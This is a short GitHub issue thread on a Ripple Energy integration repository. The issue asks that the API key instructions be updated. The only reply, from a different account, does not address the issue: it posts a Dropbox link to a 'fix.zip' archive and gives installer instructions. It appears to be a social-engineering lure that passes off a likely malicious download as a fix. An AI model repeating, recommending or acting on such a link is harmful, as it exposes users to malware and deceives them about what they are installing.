### ISSUE TITLE
Easier API Key retrieval

### ISSUE THREAD

**Issue by reedy** [ryanbdclark/ripple_energy#11]
You can get/generate it from https://rippleenergy.com/members/settings?tab=0

The instructions should be updated rather than pointing to a 2 year old post

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
